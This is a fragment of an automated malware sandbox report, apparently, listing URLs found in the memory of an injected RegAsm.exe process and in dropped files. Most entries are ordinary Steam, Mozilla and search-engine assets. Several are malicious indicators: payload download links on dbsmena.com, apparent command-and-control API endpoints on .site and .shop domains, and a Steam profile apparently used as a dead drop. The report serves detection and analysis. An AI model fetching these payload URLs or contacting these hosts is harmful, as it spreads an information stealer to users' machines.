Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000C.00000002.2801859666.0000000001445000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 0000000C.00000002.2801859666.0000000001445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/R
Source: RegAsm.exe, 0000000C.00000002.2802203193.0000000001457000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: EGIDHD.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EGIDHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EGIDHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/M
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/ljhgfsd.exe
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/ljhgfsd.exe1kkkk1219057https://dbsmena.com/vdshfd.exe1kkkk97f0d2d0242908
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/ljhgfsd.exeent-Disposition:
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exe
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exeK
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dbsmena.com/vdshfd.exetent-Disposition:
Source: EGIDHD.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EGIDHD.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EGIDHD.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/api
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/apiES
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: AKEGII.4.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
